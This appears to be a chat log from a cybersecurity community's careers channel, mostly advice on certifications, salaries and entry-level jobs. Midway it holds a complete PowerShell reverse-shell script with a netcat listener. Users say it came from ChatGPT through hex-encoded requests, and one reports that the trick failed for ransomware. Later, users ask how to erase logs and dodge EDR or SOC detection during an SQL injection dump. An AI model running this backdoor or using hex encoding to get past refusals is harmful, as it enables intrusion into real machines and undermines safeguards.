*the government organization i work for has a policy that has an approach to creating their cyber people by training from 0 to hero instead of just fishing for talent in a highly competitive pool

That’s smart

Easier to get employees if you train them

Yeah and they can afford the luxury of patience. Most likely, there will still be a government in 10 years (I'm not US)

Also, it's honestly better to train fresh people, people who haven't developed bad habits while coding so you can train them in a way that prevents the development of said bad habits. It's always easier to teach someone something they no nothing about rather than trying to get someone to stop doing something the same way they've been doing it for years

Couldn’t have said it better

the reality is that companies are hesitant to hire entry level people because entry level people aren't really useful until about 6 months in, sometimes even 1 year in. Like you don't really hit a rhythm until that point. At which point a company has spent money to train up someone, then they end up jumping to another company. Now what also happens is that if someone consistently jumps companies to increasing raises, they also end up not advancing in their skills as much as say someone who starts taking on more responsibility after 1 year. So if we had it so someone was likely to stay after year 1, companies would absolutely be willing to hire more entry level people but that isn't the case so they are less likely at that point to risk entry level people. Not to say it doesn't happen, it does.

I think one factor to also consider is the company’s size, growth rate, and how mature is their security programme. Bigger companies are more flexible in hiring entry level roles especially when they have new clients or new features being produced while smaller companies will opt for more senior people cause they will probably would want to keep a lean team.

Companies that are starting to take their security programme seriously now will look at more senior level roles rather than filling out with entry level people while people with more mature programmes are able to hire more entry level roles depending on the growth they are looking at.

can PJPT certification help me land my first jr pen test job or ill need more ?

I think its exactly the opposite

Big companies only want to hire the seniors because theyve got the money while smaller companies hire juniors and teach them in hopes of them staying there

Theres no ultimate answer to this. PJPT will definetly help you but you can also get hired without certificatea

True in some cases but you also have to factor in growth rate but I disagree with smaller companies hiring more juniors.

With a smaller company, you work with a much more constrict budget and your team won’t usually be that big. Factor in the investment to juniors, small companies might take less chances on entry level versus people with experience since there will be a much shorter time to train them up versus juniors.

You also have to consider what business the company is in. All large companies will have in house cybersecurity teams. I work for one such large company. We do hire people directly out of college but the majority of our hiring seems to be people with some experience.

I have heard consultancies are more willing to hire junior employees because they are selling their cybersecurity services to outside companies.

Can one secure employment solely based on TryHackMe certifications without a computer science degree?

It's not impossible, but it's defiently not easy.

especially remote part-time , or remote entry level positions

you dont need a degree at all (for entry) if you can prove that you know the topics & have expirience for example

i see, but whats the best place to search, I used to check many websites such as remotive etc

i have a remote job, but in my country, i dont know the best way for international jobs 😦 i am sorry

yeah i see,

in my way i would just search in the countrys that speak my language and lookup for a job that is remote. feels like most jobs today in it-security are anyway remote. apart of some special cases like forensics for legal reasons ofc

Hey y'all , is there a way u can piggyback on a gateway with a prepaid service

wut?

Sth like getting free net on a prepaid gateway ??

what gateway? what service?

an isp offering wifi connection services , for u to use that service , u have to buy a subscription package , is there a way sb can bypass that

You know that would be illegal right?

I know that bro , can u help a brother out

:hammer: redkite_21#0 has been banned.

Bye.

Red teamers/ penetration testers. What are some projects that you'd see on someone resume and think "Oh that's interesting!". We hear about the keyloggers and port scanners and nothing is wrong with that. But what are some original project ideas? I'm trying to build some cool projects for my resume

Y’all what’s the difference between cyber security and information security. I swear it’s the same thing

Information security is broader, cybersecurity is part of information security

Hm interesting

So I’m guessing information security can be anything that’s keeping information right?

Infosec includes the keys to your filing cabinet.

Makes sense

Would a door lock count

function Invoke-ReverseShell {
$IP = 'YOUR_IP_ADDRESS'
$Port = YOUR_PORT_NUMBER
$Client = New-Object System.Net.Sockets.TCPClient($IP, $Port)
$Stream = $Client.GetStream()
[byte[]]$Bytes = 0..65535|%{0}

while(($i = $Stream.Read($Bytes, 0, $Bytes.Length)) -ne 0){
    $Data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0, $i)
    $SendBack = (Invoke-Expression -Command $Data 2>&1 | Out-String )
    $SendBack2 = $SendBack + 'PS ' + (pwd).Path + '> '
    $Sendbyte = ([text.encoding]::ASCII).GetBytes($SendBack2)
    $Stream.Write($Sendbyte,0,$Sendbyte.Length)
    $Stream.Flush()  
}
$Client.Close()

}

Note: Replace 'YOUR_IP_ADDRESS' with the IP address of the listener (e.g., your machine) and 'YOUR_PORT_NUMBER' with the port number you're listening on.

To start listening on your machine, you can use Netcat (nc) with the command: nc -lvnp YOUR_PORT_NUMBER

WARNING: This script opens up a backdoor to the machine it's executed on and should only be used for educational purposes or authorized security testing.

``` ​【oaicite:0】​

Backdoor

Made by chatgpt

?

No actually

I converted my text to hex and the asked gpt to follow the hex instructions

Sorry its your name 😂

Red team infrastructure

Learn how to build it, automate it, and how to integrate it across different providers

Bonus points if you include OPSEC considerations

is it still a thing?

I think I did read a blog abt it a long time ago.

Do you mean C2 servers?

No, not just C2 servers. Your entire infrastructure. Like your short term infra to send test payloads on the org so you dont burn your actual infra, redirectors, phishing component, how you’d obscure it, secure it, etc.

Okay I'll need to do more research about it. I don't know about all that. Do I need to program all those or can I integrate multiple tools?

You can integrate multiple tools, you’ll also be delving in a bit of DevOps pipeline for it

You can also do something a bit smaller, creating a CICD pipeline for your red team tools

ZeroPoint security has a good course on it for 30 GBP i think

Do you happen to know of any resource online to learn about it?

For red team infra, i think theres lots on Google

I dont know any off the top of my head

Okay thank you I'll research tonight!

I tried this using hex about 7 days ago but it only generate code for backdoor i tried making ransomware but it did not 😕

I have a question :
How hard is finding bugs should i start studing bug bounty from htb or thm is it worth it ?

I know that there is a good demand for cyber security analyst as a broader field but any of you guys know about forensics/malware analysis field particularly?

the demand of those fields and maybe how to break into the industry

thru that

Well, if you want to do malware analysis, you'll most definately want to learn a few things about reverse engineering. You can find sites like MicroCorruption that are completly dedicated to this. They even offer you to apply for any of their positions, but you'll need a degree and probably two years experience

can you give me an idea of how that particular field might evolve in the future?

The use of AI to do basic checks, make some analysis, then it’ll be up to the analyst to confirm it

hi guys can i ask for some career advice

thats what this channel is for

A theoretical question, did an attacker manage to find sqli and the attacker wants to dump, does he have the option to delete logs? Is there an edr or a soc department that can catch it and how can it actually bypass it? I realized that if the attack is done at a slower pace then it can lower the suspicion, but is it possible to make logs disappear?

Sure. Plenty of ways, depending on how badly you want them deleted 🤷‍♂️

The real question is: why would you want them gone?

Guys.. I've been wondering. For those of you who already have careers in cybersecurity. How much is an average salary for an entry level job in your country and is the same salary available for remote workers?
I'm preparing for a little white vs black hat debate, could use all the information anyone would like to share.

I'm seeing you here for the first time. Thanks for all your content@undone shore. I really love your rooms on thm

Gave +1 Rep to @undone shore (current: #9 - 739)

there is no debate, black hat discussion beyond "it's illegal don't do it" is not allowed in this server.

Nonetheless I would still argue that it's better to be on the white side. But I would still like to know what anyone should be expecting at entry level and white is too little to accept. Especially from different countries

Understood. I wasn't going to discuss it on the server though. But where I'm from, there's this potrayal of white has as less advantageous. Wanted to argue it out with some friends of mine. But I'll take your advise anyway. No such discussion on the sever.

The big advantage to not breaking the law is that you don't have to worry about jail time, fines, and the potential of not being allowed to own or touch technology.

There's also the ethical question of what kind of person do you want to be: do you want to be a thief and dishonest, or do you want others to be able to trust you, and to act in a way that benefits society and yourself?

I had a research project running some sqli payloads and was told to execute it "cleanly" to your question is this legal

Exactlyyy!! I really don't understand why some people would rather take the risk. Last year a bank employee in my country stole an equivalent of about $92,000 through cyber fraud and tried to escape the country with his girlfriend and got caught. He's facing jail time now. Personally I think a lot of people I decieved by the way movies portrayal breaking the law us cool. One criminal being chased by organizations and evading them all. While it portrays white hats as some dudes ignored in a basement, with no social life, no friends and no soft skills and I strongly disagree with that.
Ultimately I don't think breaking the law is worth it under any circumstances for any reason. On Salary.com it says that average entry level job salary for cybersecurity analysts is about $100,000. $8,000 more than what was stolen in that incident.
In addition to ethics, I think it is actually more rewarding to be white than black. I just want to know from someone who can confirm it first hand.

it can vary quite a bit on the average salary for entry level even within a country

Oh okay, what's the average in your country?

I dunno, I'd have to google but I'm in the US so it varies widely, an average wouldn't really tell you much

Oh okay... I'll keep searching.
Thanks anyway 🤗

Gave +1 Rep to @pseudo creek (current: #14 - 476)

Hi, I would really appreciate help to really understand my question, thank you very much in any case

Gave +1 Rep to @undone shore (current: #9 - 740)

you wrote the question, are you saying you don't understand the question you asked?

im asking

"Cleanly" does not have a standardised definition in that context. I'd personally take it to mean "executes successfully and does not throw an error", but even then error-based blind SQLi works by deliberately throwing errors, so is that inherently unclean?
Either way, if the server has been configured in line with best practices then everything will be logged and monitored. Disrupting that is always possible but may require... extreme... measures, which wouldn't apply to a research project (unless you've coded in another vulnerability which aides you there), and would always be out of scope in a pentest / red team engagement.

I understand, thank you very much

Gave +1 Rep to @undone shore (current: #9 - 741)

Np 🙂

Can you offer me some insight into my question? I'm wondering what the average entry level salary for a cyber security analyst is 😅

Cyber Security Analyst, as in, SOC analyst? £25,000 - £35,000-ish for entry-level, depending on past experience, etc

Can using a proxy lower the level of suspicion both from the edr system and from the soc department? By the way, thank you very much for the help, I remind you that everything is for study purposes and I do it as a job

Think about what does a proxy actually do?

I understand, but for every req I will use a proxy, isn't that excessive? Isn't it better if I do the attack more slowly?

Wut..?

I mean using a proxy is a bit excessive?

Isn't it better to make the dump slower?

That depends entirely on the context.

Those two things aren't related

why

Well, why would you use a proxy, and why would you make the process slower?

I thought so that the edr system would not alert the soc department

If I'm wrong I'd love to learn

Why would a proxy help with that? 🤔

If you’d use a proxy that’s publicly known then it would be flagged immediately

If it sees all req very frequently from one ip address it will alert as something suspicious

Yes.. I did mean SOC. So that's the range in the UK. Is it same for a remote worker?
sorry to be so curious, but what about a Penetration tester's salary at entry level?

Oh, you mean rotating proxies?

Remote workers as in working from a foreign country or remote as in working from home but within the country?

I meant remote workers from foreign countries. But I'm now curious about those within the country as well.

Pentest salary entry level tends to be higher, but it's also harder to get into with no previous experience, so it kinda balances out. Not sure what it is across the industry in the UK, simply because it tends not to be an immediate grad job so I've not seen as many of my peers go into pentest jobs as I have seen them go into SOC jobs.
Rough estimate I'd say probably around £30k-£50k "entry level". I started on about £45k straight out of uni joining an internal finsec pentest team, but consultancies tend to pay more than internal teams, so 🤷‍♂️

WFH within the country is unlikely to be less (or much less at any rate). Orgs tend to pay in bands according to location (e.g., if I were based in London I'd be paid more than I am being based up north simply because the cost of living is significantly higher down there).
In terms of remote workers in foreign countries, I'm not sure I'm afraid. My experience is of the financial sector which tends to be quite strict with remote working -- e.g., we only take people from countries in which we already have a presence (i.e., an office), which I don't think even counts as remote work at that point 😆

Thanks a million @undone shore

Gave +1 Rep to @undone shore (current: #9 - 742)

Np 🙂

my company bases pay on where you live. We don't hire people from foreign countries for cyber security positions but what we do is may have an office in a foreign country (UK, AU for instance), they may be allowed to do limited work for the US but they are paid salaries that are standard in said country they reside

Oh wow.. I see.

Do you guys work with other country’s tho

our cybersecurity is 99% for in house cybersecurity only, there is some external work but that is limited and that work is performed by those in country. So we do have offices around the world

but like we have a follow the sun model for our SOC teams, so teams in the UK/AU may cover US off hours, meanwhile similarily for UK/AU, US may cover off hours for those countries

thanks I know a bi of reverse engineering to the point where it doesn't overwhelm me from the grt go anymore

Gave +1 Rep to @limber shale (current: #476 - 9)

however i wouldnlike to improve that

anyone got any training programmes

or anything like that??

thank you too much appreciated

Check Open Security’s traning 🙂

It is also free

oh cool thanks 👍

Can someone please tell me if i should take training from darkweb hackers ?

No?

I think you should take some time to consider what you just said, and then realize what you're asking/considering on doing.

https://tenor.com/view/spongebob-a-hell-nah-spongebob-no-meme-gif-23205156

Where is this question coming from?

Hassan

you are being too literal, we should drop this line of questioning

How to lose your identity in 3 simple steps

what did I say above? drop this line of questioning. Also what does any of the rambling you posted have to do with careers?

who deleted my message

?

I did, I said drop the topic, also what you posted had nothing to do with the channel topic which is careers

@uneven crescent has been warned.

Me?

I'm not gonna lie, I'm kinda discouraged 💔 😅 😂

Getting trained from darkweb hackers does not mean to become a blackhat bro its just all about knowledge they have .

What do you guys think fr

Im new into CS and even i know its a terrible idea.

What you decide to do is up to you but also playing with fire but like I said, this topic is closed, no more discussion

Ok ma bad

whats the general expectation experience/qualification wise for ciso's

Well from what I seen a lot of jobs ask for CISSP, which you need 5 years proven experience before you can even take the exam

yeah i should qualify for CISSP i just cant afford to take it atm, i've got 3 years experience as an IT Manager,and been programming since 2012 bachelors in IT and currently working towards a masters of cyber security, originally my goal was security architecture but not much point coupling that with a degree and thinking ciso roles might be a better fit since most the commercial experience i have is in it management

long story short trying to work out what sort of roles i should be going for or what sort of process i should be looking into to eventually land a ciso role

im fairly confident in most areas i'd need to do the tasks within the role but my concern is essentially breaking into that role with the experience and qualifications i have

@pseudo creek will be able to help when she is on as she has the experience of taking the exam and has a lot of expeience in this area

yeah i spoke to her before since security architecture was original goal, also part the reason trying to find out what i'd have to do to eventually move into a ciso role since i plan on doing the full masters eventually

you will need endorsement from a current isc2 member as well

also imo official cissp video course is useless

just buy their reference book + practice tests

scram for a weekend or two and you should be good

it’s mostly just memorising stuff, nothing special really

but people in suits like isc2 so still worth it

ehh I took the CISSP eons ago so I'm not that much help

a CISO wil have a wide variety of experience, often experience working in GRC

going from it management what would you recommend being a good next step towards that? should i be aiming for entry or should i be aiming for something that equates

I mean it depends, usually for cybersecurity management, they would want you to have cybersecurity work experience

was thinking since alot of it is it management could go hand in hand but not sure tbh so trying to work out best way to fill that gap

or would it be essentially go for entry level

well since you worked in management, you could try to figure out what jobs best fit you, like I said GRC is a good one and no you wouldn't be going for an entry level job although more technical jobs would want you to have more hands on experience before stepping into a more senior role

GRC isn't usually a technical role so it might be a good one for you

that makes sense, thanks

Of what use is a CC cert from ISC2? I completed the theoretical side, and I was a bit displeased with how little it covered practical stuff, and was instead more theotretical

Now I get that it is meant for absolute beginners, but still

I just need to take it now

Afaik There's no practical certs made by ISC² @lunar bobcat

The ISC2 has lots of different perks

Aside from the cert itself

Ngl, I learned so stuff I didn't know related to certain procedures

so sure

I don't know much about it but that is them trying to get a super beginner cert, it doesn't have any value really

For being a beginner myself, I see it as more of a filler, still

"Real" exams are something like CISSP, OSCP, etc

most people don't know about CC outside of beginners

like hiring managers, HR, etc

and yes, it is recommended that if you want to, take the CISSP, get the 'associate of ISC2' title until you get the experience

and how do I go about it?

well first step would be, figure out if it is what you should be really prioritizing over other things

if you are looking for an entry level job, things like Security+, understanding various technologies are probably more critical

I like to think I have a passion for cybersecurity

and so at first I'd look for working as a SOC analyst

as an example

so then things like Security+, possibly CySA+, Splunk and overall just general IT concepts (networing, OS, cloud, programming)

programming is not my stong point ://

well understanding it is useful, especially scripting

but its not a requirement

Understanding, yes. Coding, no.

CCSP, CISSP are almost equally theoretical tbf 😅 that’s just isc2 style

Hi Everyone! Hope everyone is doing well ! I have IT experience, security+ and have side projects as well. Other than networking and applying to usually job boards like (linkedin, indeed, builtin, etc), what is another good website to find a cyber security position?

You can directly check the websites of companies you're interested in, if there are any. Big consultancies usually have a lot of open jobs in various positions.

Not sure if it's popular where you live or if you use it already, but stepstone is also a good website to look.

okay thanks. yeah im in the US so I do go on the company websites since thats the best thing. But Ill check out stepstone as well.

thanks again !

Hope it helps

Hello everyone! I'm seeking information on various types of cryptographic attacks on protocols like TLS and SSH to enhance my cryptography skills. If anyone has knowledge about different security attacks in this domain, please share the information. I would appreciate any assistance!

you can check the book Real World Cryptography, it has the attacks, as well

Thank you for providing the information

Gave +1 Rep to @rain stratus (current: #1015 - 3)

Is this school work?

I am developing a C++ library that covers protection against attacks such as MITM, POODLE, BEAST, Heartbleed, and Oracle. I believe that during the process, I will be able to discover other types of attacks

Aren't those attacks very old?

Using TLS v1.3 negates all of the aforementioned. MITM on the otherhand, in what scenario are you looking at?

Yes, those are old types of attacks

There is a risk of downgrading the TLS 1.3 protocol version. Even though it is improved, this poses a threat of old attacks being used as a result.

I haven't fully figured out the solution for defending against attacks yet; most likely, I'll be using various methods such as Proof of Work, HMAC, Certificate, tokens, etc.

What type of positions should I be looking for if I wanna move from software engineering to cyber security with a Comp. Sci. degree and Sec+ cert?

I only have about 2 years professional experience

prolly SOC Analyst, and if you really want

since you have experience on board

maybe like a SOC Analyst with more duties

different companies request different things

Ok. I wasn’t sure what exactly to look for since each job post for the same title have different duties/requirements

what are your specific experience with software engineering?

Nothing security related

Aircraft interface stuff

so, doing coding and creating features?

Ehh

I work for the government so we haven’t really done anything

Just projects that get tossed

have you been involved with stuff such devops or sysadmin ?

So I have a little experience in a lot of things

Yeah I’ve done some docker stuff

Not much depth

Setting up pipelines on ADO, docker stuff for developing, etc

you could try an appsec role

have you tried applying security principles into those pipelines, docker, etc. ?

like not running containers with root privileges

Not really since we don’t use the pipeline

you have projects outside of work that you apply security?

Damn soc analyst salaries are not looking great

There is a scary lack of positions around me

Try job fairs

Where?

Universities around you, conferences

The only person who goes to the job fair at my local university is the people I work for :^)

Not sure what we have here for conferences… I know a nerd convention I’m going to September has an IT/security subsection I could network at

DICE southeast is tomorrow 3 hrs away

That looks interesting

Check which companies have offices near you and maybe apply directly

I’m looking a few hours away because this area sucks for tech

Is there a point in making a LinkedIn account if you’re not looking for a job in the industry at the moment?

Always good for potential recruiters to reach out/network

Hello , need some advices ... well i m a cybersecurity graduated but i worked for three years as a software engineer ....now i think it s time to go back to what i like more ....but don't know from where i can begin (certs , courses ...)

What can you advise for protection against protocol downgrade attacks?

Ask in #general

gyus, need help
I resently passed the Jr pentester course
and realize that i interested in web hacking and mb Networks and ABSOLUTELY NOT in privEsc
What i need to do\learn next?

or need to ask in other rooms?

#web-fundamentals-path

thx

is soc level 1 and soc level 2 learning path enough to get an entry level blue team job?

It get you started but you need to do more

Need more experience and projects if possible

I spend my limited time on cyber security instead of preparing for the university exam :d

Uni is more important then tryhackme. Hate to say it but it’s true

Yes, but we have a problem, I need to take a break from one of these. and I don't want it to be cybersecurity

got any other activities you can do?

From what I understand most people are starting with ( Comptia ) Network + , Security + , Pentest + , & then try other stuff like TryHackMe .. etc ( I was suggested to place , this question here )

Let me know if this is the " ideal " path , people should take.

Hello everyone, I'm quite new to the field which made me create a new profile linkdin, I'm trying to build some connections and would appreciate adding me 🤘 : https://www.linkedin.com/in/amine-elguermi/

Hey guys I am prepping for Active Directory to clear OSCP any suggestions in THM learning modules that can help ?

the THM Active Directory networks are good

so does anyone here got experience moving their major from networking to cybersecurity?

would like some advice on how you guys do it

i'm currently eyeing for CompTIA Pentest+ and CEH

I also keep OSCP for my endgame goal, but I know I'm way too far for something that advanced

Can you suggest some projects

Pentest+ and CEH are vastly different. I think Pentest+ goes more in how to manage a pentest and CEH is just all around tbh

CEH has bad rep, Pentest+ is something required by US govt agencies I think ?

OSCP is not really that advanced. It's marketed as an entry-level certification to pentesting

Do you think HTB CDSA and CPTS are good ?

Yes, very good. The only thing stopping them is they aren't that recognized yet

But doing those will get you skill and experience? Which are required for jobs right?

Skill? Yes. Experience? No

Oh okay Thanks for the talk bro

Gave +1 Rep to @dense dagger (current: #22 - 358)

lots of people can say that, but not me lol. I only have CTFs and some network-related security skills, considering my expertise now is on enterprise networking.

I've always intended to move to cybersecurity once I've completed my bachelor degree and CCNA, which expires next year. Guess now is the good time for that, but i still have no idea how

If you want to tackle OSCP, do Jr. Pentester Path -> Offensive Security path -> Wreath Network

Then you will be prepared

alright, thanks 4 the help

Gave +1 Rep to @dense dagger (current: #22 - 359)

Not to mention if you do CPTS path and do exam if you pass you ready for OSCP because that CPTS much harder then OSCP

And big difference in CPTS you get 2 attempts and 10 days. In other hand OSCP you get 24 hour only for attacking and 24 hour for report which is kind of short time

Like Mknukn mentioned CPTS not recognizable around globe so if you really looking to get a job try to do OSCP and it will help you a lot

i can try to do both honestly. Im a network engineer currently. And as of now, my focus is to shift from network engineering to SOC/red teaming jobs that my company have. So, for my situation now, OSCP and Pentest+ are more important. But skill wise, I'll look into CPTS as well

Nice you do both obviously but it all about budget but yeah good luck 👍

Hey all, taking the Pentest+ tomorrow, does anyone here have any tips or gotchas from your experience to look out for?

Best of luck with your exam. I'm sure you've practiced plenty and understand all the concepts discussed in the training you took. Just read the questions carefully and make sure the answers you choose accurately reflect the question being asked. Many multiple choice tests rely on your interpretation of the terminology in the questions. I don't think anybody can give you details about the exam content itself, apart from how the questions will be similar to many of the practice questions in the associated study guide, etc.

https://tenor.com/view/just-asking-ask-clarification-asking-gif-12183126

Hey all, hope everything is going well wanted to put it out here is there anyone that knows of possible entry level job opportunities out there it’s been extremely difficult for me to find and acquire a entry level position in the cyber security career field. I am currently working on my BS in Information technology with a special in cyber so anything would help.

Keep it going with your degree course. See if there are opportunities through your college or via LinkedIn/Indeed and other jobs sites for graduate opportunities and internships. Many companies have such programs in place and tend to open recruitment in this fashion at this time of year. You might consider certifications. A lot of the time an employer will support you in acquiring certifications that are relevant to your new position, but occasionally you might be expected to already hold or be pursuing one or several.

For instance, it can help to do the IBM or Google cybersecurity courses on Coursera. These are certificates and you can possibly cram them during the free week they give you at the start. Alternatively, the ISC2 CC free exam and training might also be considered a good indicator of your intention to pursue a career in cybersecurity, but it does have an added yearly cost to maintain and encourages you to pursue other training and certifications, on your way to acquiring their pricey and somewhat sought-after CISSP sometime down the road.

Another reasonable option is the Security+, as it's widely recognised as an entry-level certification in the field, and also a first step on the DoD certification stream (if you're American)... You might also consider having a blog or a Github to showcase the things you're studying. There are tonnes of resources (books, courses, certifications & projects) that can help you demonstrate your learning and progression

Do you guys recommend to go for eJPT first or CEH for my first red team cert?

neither?

are you in India?

No, Belgium

yeah I wouldn't do either of those, you might have to look for Belgium specific requirements, OSCP, from what I understand is very popular in EU as well as other places

there is also PJPT or PNPT from TCM Security or CPTS from HTB but those most likely wouldn't have hireability factors

I wouldn't recommend either of those. eJPT and all INE certs/training have vastly poorer quality since they took over from eLearnSecurity. Also, unless you're in India, I'd avoid EC Council/CEH altogether. Their overpriced multiple choice quiz and a lot of their content are reportedly plagiarised from other companies and they have a reputation for highly unethical practices.

I'd suggest pursuing CompTIA certs like Network+, Security+, CySA+ or Pentest+ starting out and also consider certs like the TCM PNPT, HTB CPTS, OffSec OSCP, and down the road consider Zero-Point's CRTO I & II, Altered Security's CRTP/CRTE. But also, spend time first playing around here on THM and discussing your options with Zojja or myself and the other community members

oh yeah I always forget zero point's CRTO, lots of people like that one

Yeah it looks really interesting and you get to play around with Cobalt Strike in their labs. There's also no report requirement

Don’t security conventions have recruiters

A recruitment convention might have a method to share your cv, regular computer conventions, they might give you some reading material and an email address/website to send your application, but you'll have far more opportunities through LinkedIn, Indeed, et al.

The best resources for job searching will be the connections you make at university and alumni groups.

Hello , need some advices ... well i m a cybersecurity graduated but i worked for three years as a software engineer ....now i think it s time to go back to what i like more ....but don't know from where i can begin (certs , courses ...)

Subtlety said a pretty solid line up here #cyber-and-careers message

Thank you so much

Gave +1 Rep to @brittle pier (current: #180 - 33)

I just realized that CEH is a multiple choice exam.

doesn't it sound a bit inconvenient?

like becoming a hacker via multiple choices??

It's not a great exam

Is learning section in tryhackme is free or paid ? 👀

There are subscriber paths and free paths

Tho for the subscriber paths you can find free rooms people made that are about the same stuff

“Some”

Do you happen to know or know what to look for when going for entry level job positions with no experience? What could be the best started jobs to get my foot in the door to apply? Every job it seems to require 3-10 yrs of experience and it blows my mind that there are no entry level jobs that I can find that are 0 yrs experience?

@winged haven I am going through the same scenario currently but have decided to start with a help desk IT job and it in a related field, my goal from there is sys admin and then from their hopefully be done with school and find a cybersec job

@hallow raptor really? Well that’s nice to hear others are going through the same. Because I have been trying for a year now and nothing this far.

In my opionion, it just takes two main things tbh. Being as persistant as possible no matter how shit it feels not getting call backs or anything... trust me I know, and learning as much as you can.

the more you learn the more you know which you can use in aplpying for jobs and eventually you might even be able to skip through jobs tiers becuase of what you know. BE a SPONGE

Appreciate it @hallow raptor this helps a lot. Guess for now just keep applying, and pray. Any companies you think would be best bet?

I would look local, and honestly try on-site over remote if you can. Remote is awesome cause your at home but on-site if you have other peers there you can use them as resources to learn and grow. Also narrows the application list as a lot of people are looking for remote work currently

Hello , does it help to publish room done to linkedin to find job opportunities or recruiter doesn’t care ?

Probably not, unless you're the first one to complete it, or otherwise do a room where no one else has made a write up for. There's no way to tell if you completed it off of skill or off a guided spoon fed walkthrough.

Yes you’re right but it means also that you can achieve a pretty good decent score with all the writeup by cheating and then tryhackme profile doesn’t help at all on job seeking ? To be clear, I’m doing thm to learn and not to find a job, just wondering if it help as a kind of resume ? Prob not

That's correct, if the recruiter or interviewer knows what thm is and you use that as your only qualifier, it may not speak as well of you as you hope it would

Can you help me decide how to transmit data over TLS - in blocks or one-time? The first option offers high security, while the second prioritizes performance and efficiency. Which solution should be preferred?

Hey can you ask your friend to post it here instead of you please?

in both cases the cipher contexts would start the same, so it wouldn't really matter much

Passed the Pentest+ exam 🤙

Besides the OSCP, what are some other desirable red-teaming certs that are around that level of knowledge/practical knowledge?

Well done! Some that come to mind are PJPT, PNPT, CRTO. Keep in mind that the exams will be very different compared to Pentest +. No multiple choice questions.

Question do certs give you instructions on the stuff you have to research I order to pass? Or do you just study what ever you think would help you pass it

Like are you going in blindly?

Most will give you all the details needed and provide you with study material (some include this with the exam fee, others ask for more $$).
I'd recommend visiting some of these websites to have a look at their certs" CompTIA, OffSec, TCM Academy,

Thanks

Gave 1 Rep to drgonzo7383 (current: #48 - 150)

Thank you 😄. I'll take a look into those, the more practical questions the better in my opinion. That's what I liked about the eJPT v1

Gave +1 Rep to @little matrix (current: #48 - 151)

In my experience, I find learning the concepts of theory and applying them to practical knowledge is most important. A lot of certs will cover these concepts and then either stay surface level or dive into specific topics. Usually, will aim for the certs requirements but will explore a bit and try to learn things the cert might not talk about.

I'm sure there's a better way out there but that's just what I do lol

I actually like that because diving deeper gives you a better understanding with the surface level stuff

Exactly 💯

Pentest+ -> PJPT -> OSCP yea/nea?

Hello , do you recommend pecb certs ?

Pentest+ is good for theory and might be recognised by hr departments as your intent to pursue pentesting, but has no practical exploration/examination. PJPT covers the first section of the PNPT, so it might be more value to just do that. The OSCP is a complete exploration of the junior pentester path from basics to having the pentesting skills for a junior role and is highly valued by HR departments, pentesting teams and their clients.

You might alternatively pursue CPTS, CRTO, CRTP/CRTE. You can get comfortable with a lot of the skills needed, from Linux, Windows and networks to more complex concepts through THM and the paths and networks available to explore.

Check your local job market which is desirable

Hello everyone, which rooms do you recommend starting with for penetration testing training on the TryHackMe platform?

@naive wadi I had this question just a few months ago, did the Intro to Cybersecurity learning path then the Jr Penetration Tester learning path. I dont remember if certain rooms are for subscribers or not but the jr pen tester learning path was really fun, recommended to me by a friend/mentor in the field with OSCP

Do you have a chance to send me the links of the rooms you solved for learning, either privately or from anywhere?

just sent a dm of the jr pen test learning path

thank you for helping

Gave +1 Rep to @indigo light (current: #2040 - 1)